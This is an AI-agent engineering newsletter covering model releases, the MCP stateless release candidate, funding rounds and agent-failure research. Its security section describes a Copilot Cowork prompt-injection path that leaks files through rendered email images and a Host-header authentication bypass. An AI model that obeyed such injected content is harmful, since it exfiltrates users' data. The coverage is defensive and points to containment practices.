Artificer’s Grimoire — Edition 14 · May 31, 2026

The week belonged to Anthropic — a $65B Series H at a $965B post-money valuation, Claude Opus 4.8, and a Dynamic Workflows research preview that runs hundreds of parallel subagents in one session, all inside five days, capped by a detailed writeup of how the company contains its own agents across products. But the load-bearing infrastructure story is one level down: the Model Context Protocol published a 2026-07-28 release candidate that removes protocol-level sessions and the initialize handshake, makes MCP stateless, and deprecates Roots, Sampling, and Logging — the biggest shape change to the protocol since it launched. Running parallel to both, two agent-security disclosures — Microsoft Copilot Cowork’s rendered-image data leak and “BadHost,” a critical authentication-bypass flaw in Starlette’s 325-million-downloads-a-week footprint — plus Cognition’s $1B Series D for the async-agent thesis round out a week where the platform layer, the protocol layer, and the threat layer all moved at once.

Must Read

Claude Opus 4.8 + Dynamic Workflows land the same day as a $65B Series H

Sources: Anthropic — Introducing Claude Opus 4.8 · 2026-05-28 · Anthropic — Series H · 2026-05-28 · Claude Code Docs — Workflows · TechCrunch — Anthropic releases Opus 4.8 with new ‘dynamic workflow’ tool · 2026-05-28 · MarkTechPost — Anthropic Ships Claude Opus 4.8 Alongside Dynamic Workflows and Cheaper Fast Mode, With Workflows Capped at 1,000 Subagents · 2026-05-28 · Latent Space — Anthropic raises $965B Series H, releases Opus 4.8 and Dynamic Workflows/ultracode · 2026-05-29 · Simon Willison — Claude Opus 4.8: “a modest but tangible improvement” · 2026-05-28 Score: 5 · Tags: anthropic, opus-4-8, dynamic-workflows, subagents, agent-orchestration, funding

Anthropic shipped a model and a funding round on the same day. Claude Opus 4.8 lands 41 days after 4.7 at unchanged regular pricing ($5/$25 per million input/output tokens), with fast-mode pricing cut to $10/$50 from the prior $30/$150. Anthropic’s own framing emphasises code honesty: the model is, per its post, “around four times less likely than its predecessor to allow flaws in code it has written to pass unremarked.” The launch feature is Dynamic Workflows (research preview, Enterprise/Team/Max), which lets Claude “plan the work and then run hundreds of parallel subagents in a single session” for codebase-scale migrations across hundreds of thousands of lines; trade-press coverage (TechCrunch, MarkTechPost) reports the workflows are capped at 1,000 subagents. Anthropic’s Claude Code documentation pairs this with an ultracode setting (/effort ultracode) that combines xhigh reasoning effort with automatic workflow orchestration: with it on, Claude plans a workflow for each substantive task rather than waiting to be asked, and a single request can spawn several workflows in sequence — one to understand the code, one to make the change, one to verify it. It’s session-scoped (drop back with /effort high) and offered only on models that support xhigh effort. Separately, the Series H raised $65B at a $965B post-money valuation, and the announcement disclosed that run-rate revenue “crossed $47 billion earlier this month.” Simon Willison’s read on the model itself: “a modest but tangible improvement.”

Why it matters: The interesting thing isn’t the model bump — Willison’s “modest but tangible” is the right register, and a 41-day cadence makes any single point release less of an event. It’s that Dynamic Workflows is Anthropic shipping the multi-agent orchestration pattern as a first-party product primitive, not a framework you assemble yourself. The Grimoire has tracked subagent fan-out as a harness-engineering pattern for months; “plan, then run hundreds of subagents in one session, capped at 1,000” is that pattern with a vendor SLA and a billing model attached. Two practitioner implications. First, the build-vs-buy line for orchestration moves the same way the runtime line moved in Editions 11–13 — if your team has been hand-rolling a planner-plus-worker-pool on top of the Agent SDK, the managed version now exists and the differentiation shifts to how you decompose work, not how you schedule it. Second, the fan-out-to-hundreds pitch collides directly with the orchestration-tax reality Osmani named (and Edition 13 covered): spawning 1,000 subagents is cheap, but the human judgement to merge their output still routes through one serial reviewer. The cap is a scheduling number; the bottleneck is attention, and that doesn’t parallelise. The $47B run-rate and $965B valuation are the capital backdrop that makes shipping a model, an orchestration product, and a price cut in one day economically routine for a frontier lab — which is itself the story.

MCP goes stateless — the 2026-07-28 RC is the biggest protocol reshape since launch

Sources: modelcontextprotocol/specification — MCP 2026-07-28 RC · 2026-05-29 · MCP draft changelog Score: 5 · Tags: mcp, protocol, stateless, transport, deprecation, agentic-protocols

The Model Context Protocol published its 2026-07-28 release candidate, and the changelog (measured against the prior 2025-11-25 revision) is a structural reshape rather than a feature drop. The headline moves: remove protocol-level sessions and the Mcp-Session-Id header from the Streamable HTTP transport (SEP-2567); make MCP stateless by removing the initialize/notifications/initialized handshake, so every request now carries its protocol version, client identity, and capabilities in _meta (SEP-2575); add a mandatory server/discover RPC for up-front version and capability negotiation; replace the HTTP GET endpoint and resources/subscribe/unsubscribe with a single long-lived subscriptions/listen stream; and introduce a Multi Round-Trip Requests (MRTR) pattern that replaces server-initiated requests like roots/list, sampling/createMessage, and elicitation/create with an inputRequests/inputResponses exchange (SEP-2322). On the deprecation side, Roots, Sampling, and Logging are now deprecated (SEP-2577), as is the older HTTP+SSE transport, under a newly adopted feature-lifecycle policy with a minimum twelve-month deprecation window. The RC is explicitly not final — changes may land before release — but SDKs will begin adopting it.

Why it matters: This is the protocol catching up to how MCP is actually deployed at scale. Protocol-level sessions and a stateful handshake are awkward for serverless and horizontally-scaled MCP servers — every connection carrying its own session state is exactly the thing that breaks behind a load balancer. Making the protocol stateless (identity and capabilities in _meta on every request, explicit server-minted handles when cross-call state is genuinely needed) is the change that lets MCP servers scale like ordinary stateless HTTP services. For practitioners, three things land. First, if you operate MCP servers, this is a migration with a real surface: the initialize handshake going away and server/discover becoming mandatory means SDK upgrades will be load-bearing, not cosmetic. Second, the deprecation of Sampling and Roots ratifies what enterprise gateways already did in practice — most teams pass context via tool parameters and call LLM provider APIs directly rather than routing sampling back through the client; the spec now points the same direction. Third, the minor-but-telling additions — deterministic tools/list ordering and a CacheableResult interface with ttlMs/cacheScope — are prompt-cache and polling-cost optimisations baked into the protocol, the same token-economics discipline GitHub demonstrated this week (see Worth Scanning). The twelve-month deprecation window is the practitioner’s planning runway; the migration map is the scout this deserves.

The hard part is still keeping data in the box — Copilot Cowork, BadHost in Starlette, and Anthropic’s containment doc

Sources: Simon Willison — Microsoft Copilot Cowork Exfiltrates Files · 2026-05-26 · Ars Technica — Millions of AI agents imperiled by critical vulnerability in open source package · 2026-05-26 · OSTIF — Disclosing the BadHost vulnerability in Starlette (CVE-2026-48710) · Anthropic — How we contain Claude across products · 2026-05-30 · Simon Willison — How we contain Claude across products · 2026-05-30 Score: 5 · Tags: data-exfiltration, prompt-injection, sandboxing, supply-chain, starlette, agent-containment

Three security stories in one week, all circling the same problem: keeping attackers away from the data and credentials inside agentic systems. Microsoft Copilot Cowork was found to allow agents to send emails to the user’s own inbox without approval; those messages could embed external images whose network requests exfiltrate data when the message is rendered, and OneDrive’s pre-authenticated download links gave a successful prompt injection a path to leak file contents. Willison’s framing: “The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data.” “BadHost” (CVE-2026-48710) is a critical authentication-bypass flaw disclosed in Starlette — the ASGI framework beneath FastAPI and a large share of Python MCP-server and agent stacks. Reporting describes an attacker injecting path components into the HTTP Host header to slip past auth checks and reach protected endpoints, with credential theft as the downstream risk. Per Ars Technica, Starlette draws roughly 325 million weekly downloads, so the blast radius runs through a great deal of agent infrastructure. And Anthropic published “How we contain Claude across products,” a detailed overview of its sandbox techniques across Claude.ai, Claude Code, and Cowork: “We constrain where and how an agent can act with process sandboxes, VMs, filesystem boundaries, and egress controls. The goal is to set a hard boundary on what an agent can reach.” The load-bearing principle, in Anthropic’s words: “if credentials never enter the sandbox, they can’t be exfiltrated, regardless of whether the cause is a user, a model finding a ‘creative’ path.” Willison — a frequent critic of under-documented sandboxes — calls it “a fantastic overview.”

Why it matters: Put the three side by side and you get the whole shape of the problem. Copilot Cowork is the live failure: a shipping agent product with an exfiltration path through the most mundane primitive imaginable — an email with an image in it. BadHost is the substrate failure: the framework layer under MCP servers gets a critical CVE and suddenly patch triage spreads widely, because 325M weekly downloads means many teams may have Starlette exposure indirectly, even if they did not choose Starlette explicitly. Anthropic’s containment doc is the constructive answer, and it’s worth reading as a design spec rather than marketing: the “credentials never enter the sandbox” principle is the single most useful framing for teams designing their own agent boundaries, because it converts an unwinnable game (predict every creative exfiltration path a model might find) into a winnable one (ensure the thing worth stealing was never reachable). For practitioners, the action items are concrete: audit whether your agent products can emit outbound network requests through rendered content (the Cowork vector), put Starlette/FastAPI on this week’s patch list and check your MCP-server base images, and use Anthropic’s containment writeup as a checklist against your own harness — process sandbox, VM boundary, filesystem scope, egress control, and credential isolation as five separate questions, not one. The exfiltration problem is not getting easier; it’s getting better documented, which is the next best thing.

Cognition raises $1B for the async-agent thesis

Sources: Latent Space — Cognition raises $1B in $26B Series D · 2026-05-28 · Latent Space — The Age of Async Agents (Cognition’s Walden Yan & OpenInspect’s Cole Murray) · 2026-05-28 Score: 4 · Tags: cognition, devin, async-agents, spec-to-pr, autonomous-coding-agents, funding

Latent Space reports that Cognition, the company behind Devin, raised $1B at a $26B Series D. The companion Latent Space conversation with Cognition’s Walden Yan and OpenInspect’s Cole Murray frames the pitch as “the Age of Async Agents”: full-VM execution, spec-to-PR workflows, agent memory, and a headline figure that agent-authored commits now make up roughly 80% of Devin’s. Latent Space’s gloss on the market logic is blunt — “coding is an uncapped TAM market.”

Why it matters: Cognition raising at $26B is the competitive-landscape datapoint, but the async-agent framing is the practitioner-relevant part, and it’s a genuine fork from the Anthropic/Google direction. Dynamic Workflows and ultracode are about doing more within a session — fan out, parallelise, finish the task while the human watches. The async thesis is about the human not watching: the agent runs in a full VM against a spec, opens a PR, and the human’s first contact is review. Both are real patterns, and they have different failure modes — the synchronous-swarm model hits the orchestration tax (attention doesn’t parallelise), the async model hits the merge-and-review-trust problem (the 20,574-session study in Papers is the empirical read on exactly this: most agent failures impose trust and effort costs, and ~91% of visible resolutions still need explicit user correction). For teams choosing an operating model, the question Cognition’s raise sharpens is whether your workflow is “agent as fast pair” or “agent as async contributor whose PRs you review” — they want different harnesses, different review discipline, and different memory architectures.

Google folds Gemini CLI into Antigravity CLI — free users migrate by June 18

Sources: Google Developers Blog — An important update: Transitioning Gemini CLI to Antigravity CLI · 2026-05 Score: 4 · Tags: google, antigravity-cli, gemini-cli, coding-agents, deprecation, multi-agent

Google is transitioning the community-focused Gemini CLI into Antigravity CLI, a Go-based, agent-first command-line platform built for multi-agent workflows with asynchronous processing and a unified architecture that syncs with the Antigravity 2.0 desktop app (which Edition 13 covered at I/O). Enterprise customers retain existing access, but individual and free users must migrate before Gemini CLI stops serving requests on June 18, 2026.

Why it matters: This is the CLI consolidation that completes the Antigravity repositioning. Gemini CLI was the open, community-facing terminal tool; Antigravity CLI is the agent-platform-aligned successor, and the rewrite to Go plus async processing signals Google treating the terminal as a first-class agent surface rather than a chat wrapper. For practitioners, the immediate detail is the hard cutoff: June 18 is a deprecation date, not a soft nudge, and any pipeline, script, or CI step shelling out to gemini needs a migration plan before then. The broader signal is that major vendors appear to be clustering around the same surface area — Anthropic’s Claude Code, OpenAI’s Codex CLI, and now Antigravity CLI are all agent-first terminal tools backed by a desktop/platform counterpart, and the differentiation is increasingly the orchestration model (Antigravity’s async/multi-agent framing) rather than the model behind it.

The methodology layer hardens — VibeSec Reckoning, regression sensors, and a 20,574-session failure study

Sources: Martin Fowler / Thoughtworks — The VibeSec Reckoning · 2026-05-27 · Martin Fowler / Birgitta Böckeler — The test suite as a regression sensor · 2026-05-27 · arXiv — How Coding Agents Fail Their Users: 20,574 Real-World Sessions Score: 4 · Tags: vibe-coding, security, regression-sensors, failure-modes, methodology, harness-engineering

The coding-agent methodology literature added three substantive pieces this week. “The VibeSec Reckoning” — Gautam Koul, Lucian Moss, Neil Drew-Lopez, and Daberechi Ruth Edeokoh document building Thoughtworks marketing applications with AI agents that frequently recommended insecure configurations, and their countermeasures: write a security-context file to guide the AI, be cautious with AI permission requests, maintain a daily security-intelligence feed, and give builders a secure-by-default harness and templates. Böckeler’s latest sensors installment frames the test suite itself as a regression sensor — instrumentation the harness uses to catch the regressions agentic coding introduces. And the empirical anchor: “How Coding Agents Fail Their Users,” a study of 20,574 real-world sessions across 1,639 repositories that names seven recurring forms of developer-agent misalignment. Its headline finding, verbatim: “90.50% of episodes impose effort and trust costs rather than irreversible system damage, yet 91.49% of visible resolutions still require explicit user correction.”

Why it matters: Edition 13 caught the methodology wave forming (Fowler’s Bliki, Böckeler’s first sensors, Osmani’s orchestration tax). This week it gets sharper and more operational. The VibeSec piece is the security counterpart to the maintainability sensors — same Thoughtworks instinct (don’t trust the agent’s defaults, instrument the harness to catch what it gets wrong), applied to the configuration-security failure mode that vibe coding reliably produces. The “secure-by-default harness and templates” recommendation is the load-bearing one: it moves security left of the agent, into the scaffolding the agent operates inside, which is exactly where the containment-doc thinking from this week’s security cluster points. The 20,574-session study is the dataset the whole methodology conversation needed — the reassuring read is that most agent failures are recoverable (effort and trust costs, not irreversible damage), but the sobering one is that ~91% of resolutions still need a human to step in, which is the empirical shape of the orchestration tax and the strongest available argument against “set it and forget it” autonomy. Together: agents fail in characterisable ways, the harness can sense some of those failures, and the human-correction rate stays stubbornly high. That’s the curriculum for anyone operating these workflows in production.

Worth Scanning

GitHub Slashes Agent Workflow Token Spend up to 62% with Daily Audits and MCP Pruning (InfoQ, 2026-05-29) — GitHub reports cutting agentic-CI token costs up to 62% by pruning unused MCP tools, swapping some MCP calls for the gh CLI, and running daily “auditor” and “optimizer” agents; a token-usage.jsonl artifact and an “Effective Tokens” metric track spend and catch regressions. First-party, directly actionable.
Cloudflare Adds Support for Claude Managed Agents (InfoQ, 2026-05-28) — Run and manage Claude Managed Agents on Cloudflare, connecting to private systems with a choice of runtime and Cloudflare-native monitoring; extends the six-layer platform Edition 13 covered.
Azure Logic Apps Adds Sandboxed Code Interpreters to Agent Workflows (InfoQ, 2026-05-27) — Microsoft’s take on safe code execution inside orchestrated agents; pairs with the containment thread.
Arm Open-Sources Metis, an AI Security Framework Outperforming Traditional SAST (InfoQ, 2026-05-30) — Agentic code-scanning framework Arm reports beats traditional SAST; lands the same week as Microsoft’s MDASH large-scale AI vulnerability research.
Microsoft Introduces MDASH for Large-Scale AI Vulnerability Research (InfoQ, 2026-05-25) — Microsoft’s framework for AI-driven vulnerability discovery at scale; the agents-applied-to-security trend continues across vendors.
Inside a 176-Package npm Campaign Built to Beat Your Internal Dependencies (Sonatype, 2026-05-28) — Dependency-confusion campaign engineered against internal packages; fresh input for the agent-substrate-attack-surface thread.
Exploit Code Published for Critical Flowise RCE Vulnerability (SecurityWeek, 2026-05-30) — Public exploit for an RCE in the Flowise low-code LLM/agent builder; more than generic CVE noise for this audience given Flowise’s place in the agent-builder ecosystem.
Build Long-running AI Agents That Pause, Resume, and Never Lose Context with ADK (Google, 2026-05) — Durable pause/resume arrives in Google’s ADK; the durable-execution pattern (cf. Step Functions, Temporal) in the Google agent stack. ADK for Kotlin/Android 0.1.0 also shipped.
Anthropic’s run-rate revenue hits $47 billion (Simon Willison, 2026-05-29) — Willison unpacks the Series H run-rate figure (an annualised projection from the most recent month) and Anthropic’s habit of disclosing it inside funding announcements; useful caveat for reading the headline number.
A2A Protocol v1.0.1 (a2aproject, 2026-05-28) — Patch release on the agent-to-agent protocol post-1.0.
GitHub Spec Kit 0.8.14 → 0.8.18 (github/spec-kit, 2026-05-26 → 05-29) — Five point releases in the window; rapid-iteration signal on the SDD tooling front.
Notes on Pope Leo XIV’s encyclical on AI (Simon Willison, 2026-05-25) — The papal AI encyclical “Magnifica humanitas” drew commentary from Anthropic co-founder Chris Olah and a detailed read from Willison; governance/policy beat.

New Tools & Repos

Antigravity CLI — Go · Google’s agent-first terminal successor to Gemini CLI, built for async multi-agent workflows and synced with Antigravity 2.0.
Arm Metis — Open-source agentic AI security framework Arm reports outperforms traditional SAST tooling.
datasette-agent 0.1a4 — Python · Simon Willison’s constrained agent harness over Datasette + SQLite (alongside datasette 1.0a30/1.0a31 and llm-anthropic 0.25.1).
markdown-svg-renderer — Utility for rendering markdown to SVG; small but characteristic Willison tool release.
LangGraph 1.2.2 + SDK 0.4.0 + CLI 0.4.27 — Core patch plus a minor SDK bump that may carry interface changes worth a scan.
CrewAI 1.14.6 — Stable patch release (1.14.6a2 preview also shipped).

Papers

How Coding Agents Fail Their Users: A Large-Scale Analysis of Developer-Agent Misalignment in 20,574 Real-World Sessions — Ningzhi Tang, Chaoran Chen, Gelei Xu, Yiyu Shi, Yu Huang, Collin McMillan, Tao Dong, Toby Jia-Jun Li — Names seven forms of developer-agent misalignment across 20,574 sessions from 1,639 repositories; reports most failures impose effort/trust costs rather than irreversible damage, but ~91% of visible resolutions still need explicit user correction.
Guardrails Beat Guidance: A Large-Scale Study of Rules, Skills, and Persistent Configuration for Coding Agents — Large-scale comparison arguing hard guardrails outperform soft guidance for steering coding agents; directly relevant to the AGENTS.md/skills/persistent-config debates.
Coherence Collapse: Diagnosing Why Code Agents Fail After Reaching the Right Code — Characterises a failure mode where agents reach a correct solution and then degrade it; part of this week’s coding-agent-failure cluster.
SpecBench: Evaluating Specification-Level Reasoning for Software Engineering LLM Agents — A benchmark for specification-level reasoning in SE agents; empirical grounding for the SDD thesis (pairs with Verus-SpecGym, 2605.26457).
Contractual Skills: A GovernSpec Design Framework for Enterprise AI Agents — A governance-spec framework for enterprise agent skills, intersecting the skills ecosystem with agent governance.
Security, Privacy, and Ethical Risks in OpenClaw — Risk analysis of the open-source OpenClaw coding-agent harness; primary input for the harness-attack-surface and disclosure-cadence threads.
The Best-Laid SCHEMEs: Coordinated Sabotage and Monitoring in Multi-Agent Systems — One of a multi-agent-security cluster this week alongside “Got a Secret? LLM Agents Can’t Keep It” (privacy leakage) and “IterInject” (indirect prompt injection); collectively a maturing research front on adversarial multi-agent behaviour.

Ecosystem Watch

Anthropic Series H (Anthropic, 2026-05-28) — $65B raised at a $965B post-money valuation; run-rate revenue disclosed as having “crossed $47 billion earlier this month.”
Claude Opus 4.8 + Dynamic Workflows (Anthropic, 2026-05-28) — New flagship at unchanged $5/$25 pricing with fast mode cut to $10/$50; Dynamic Workflows research preview runs up to 1,000 subagents per session (cap per trade press).
Cognition raises $1B at $26B Series D (Cognition, via Latent Space 2026-05-28) — Capital for the async-agent thesis; Devin’s commits reported ~80% agent-authored.
Google transitions Gemini CLI to Antigravity CLI (Google, 2026-05) — Go-based agent-first CLI; Gemini CLI stops serving free/individual users June 18, 2026.
Cloudflare adds Claude Managed Agents support (Cloudflare, via InfoQ 2026-05-28) — Run/manage Claude Managed Agents on Cloudflare with private-system connectivity and native monitoring.
Geordie raises $30M for AI security and governance (Geordie, via SecurityWeek 2026-05-28) — Another AI-governance funding round in the agent-security adjacency.
MokN raises $15M for phish-back platform (MokN, via SecurityWeek 2026-05-29) — Security-tooling round worth noting alongside the broader agentic-security funding flow.

The Long View

There’s a tidy story to tell about this week — Anthropic at a $965B valuation and $47B run-rate, shipping a model, an orchestration product, and a price cut in a single day — and the tidy story is mostly true. But the more durable signal is one level down, in two changes that don’t make headlines: MCP going stateless, and Anthropic publishing how it contains its own agents. Both are infrastructure maturing in public.

The MCP statelessness move is the protocol admitting how it’s actually deployed. Sessions and a stateful handshake are fine for a single long-lived STDIO connection on a developer’s laptop; they’re friction for an MCP server running behind a load balancer serving thousands of agents. Pushing identity and capabilities into per-request metadata, minting explicit handles only when cross-call state is genuinely needed, deprecating Sampling and Roots because enterprise gateways already routed around them — this is the unglamorous work of a protocol growing up into production. The twelve-month deprecation window is the tell: MCP now has a feature-lifecycle policy, which means it’s being run like infrastructure people depend on, not an experiment.

Anthropic’s containment doc is the same maturation on the security side. For most of the past year, agent-sandbox security has been a research-and-disclosure cycle — someone finds a creative exfiltration path, the vendor patches, sometimes quietly. Publishing a clear writeup of the boundaries (process sandbox, VM, filesystem scope, egress control, credential isolation) shifts the conversation from “trust us” to “here’s the model, evaluate it.” The “credentials never enter the sandbox” principle is the most transferable idea of the week precisely because it’s not Anthropic-specific — it’s a design rule any team can apply.

The week’s two security disclosures are the reminder of why this maturation matters and how far it has to go. Copilot Cowork leaked through an email image; BadHost bypassed authentication through a framework with 325 million weekly downloads. The platform layer is consolidating, the protocol layer is hardening, frontier-lab capital remains extraordinarily abundant — and the agent can still be talked into emailing your files to a stranger. The infrastructure is maturing, and the threat model is expanding right alongside it. Neither is finished.

The Artificer’s Grimoire — weekly intelligence on harness engineering for agentic systems — a practitioner’s field guide, by Tim Schiller (Artificer Digital).

Artificer's Grimoire — Edition 14 · May 31, 2026